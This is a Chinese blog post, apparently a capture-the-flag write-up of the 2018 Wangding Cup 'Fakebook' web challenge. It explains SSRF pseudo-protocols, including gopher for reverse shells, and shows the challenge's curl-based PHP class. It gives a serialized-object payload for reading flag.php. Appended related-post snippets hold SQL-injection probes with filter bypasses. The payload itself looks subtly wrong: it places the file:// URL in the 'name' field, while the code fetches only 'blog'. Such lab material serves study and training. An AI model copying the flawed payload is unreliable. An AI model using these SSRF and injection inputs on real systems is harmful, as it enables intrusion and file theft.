[网鼎杯 2018]Fakebook 1

已于 2023-03-29 21:44:08 修改
阅读量206 收藏 1
点赞数
文章标签: php 网络安全 web安全
于 2023-03-29 21:41:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129822777
版权

文章目录

[网鼎杯 2018]Fakebook 1

考察知识点:

一.SSRF伪协议漏洞注入

可能产生SSRF的函数:
1、file_get_contents:
2、sockopen():
3、curl_exec():
4.fopen():

二.SSRF中的伪协议

file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容
dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等
gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell
http/s协议:探测内网主机存活

<?php


class UserInfo//唯一 一个类
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)    
    {
        $ch = curl_init();// 创建一个curl资源      

        curl_setopt($ch, CURLOPT_URL, $url); // 设置url和响应,需要获取的URL地址,也可以在curl_init()函数中设置。 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//CURLOPT_RETURNTRANSFER将curl_exec获取的信息以文件流形式返回,而不是直接输出
        $output = curl_exec($ch); // 抓取url并把它返回给浏览器
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch); //关闭curl,并释放资源
        return $output;
    }
    public function getBlogContents ()
    {
        return $this->get($this->blog);// 传参blog到get
    }
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

构建 payload:

O:8:"UserInfo":3:{s:4:"name";s:29:"file:///var/www/html/flag.php";s:3:"age";i:1;s:4:"blog";s:1:"1";}
Harder.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网鼎杯 2018]Fakebook1
陈艺秋的博客
06-08 1201
结合起来得出结论,以上代码存在ssrf和反序列化,当我们注册后,把我们的信息序列化一下,然后存进data。注册的其他行数据,差不多都可以乱填,只有一个blog项,估计是后台做了一些限制(必须包含某些字符之类的),随便填会报错。得到关键信息,前面都没有注意这段报错信息,这里包含了一个反序列化函数,和一段路径,后面会用到。路径是之前注入的时候报错爆出来的,序列化值也不用自己生成,之前注入出来了,改长度和值就行。因为出现上面的情况,所以猜测不是字符型注入,用了一点小方法,出现计算,说明是整数型注入。
BUUCTF——[网鼎杯 2018]Fakebook
最新发布
m_de_g的博客
04-24 490
【代码】BUUCTF——[网鼎杯 2018]Fakebook
[网鼎杯 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 303
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
1713010552田靖宇-8月13日日志1
08-04
这篇日志记录的是一个关于信息安全实训的过程,作者在探索一个名为"fakebook"的系统时,发现了多个安全漏洞。以下是对这些知识点的详细说明: 1. **POST注入**:作者在注册账号过程中发现了一个POST注入漏洞。这...
BUUCTF[网鼎杯 2018]Fakebook 1
snowlyzz的博客
05-01 856
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1478
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
BUUCTF [网鼎杯 2018]Fakebook 1
weixin_45642610的博客
01-19 4709
BUUCTF [网鼎杯 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
BUUCTF Web [网鼎杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1
网安小趴菜
09-14 438
BUUCTF Web [网鼎杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1
网络安全 | CTF】fakebook网鼎杯2018)解题详析
热门推荐
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
[网鼎杯 2018]Fakebook
m0_62905261的博客
08-12 229
[网鼎杯 2018]Fakebook
[网鼎杯 2018]Fakebook1(BUUCTF闯关日记)
qq_64201116的博客
05-22 270
进入页面 源代码也没有什么东西,就先尝试一下注册一个账号试一下 注册成功后,可以进入页面看一眼,发现有一个自己的账号可以点进去,那就看看有什么 一看到url?no=1 DNA都动了一下,不假思索想到SQL注入,尝试一下 ?no=1 and 1=1 #咩问题 ?no=1 and 1=2 #出错的页面(所以多半存在sql注入) ?no=1 order by 4 没问题 ?no=1 order by 5 出错的页面(存在4个字段) 使用显错注入 同时这里还用到了内敛注释绕过,因为直接u

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值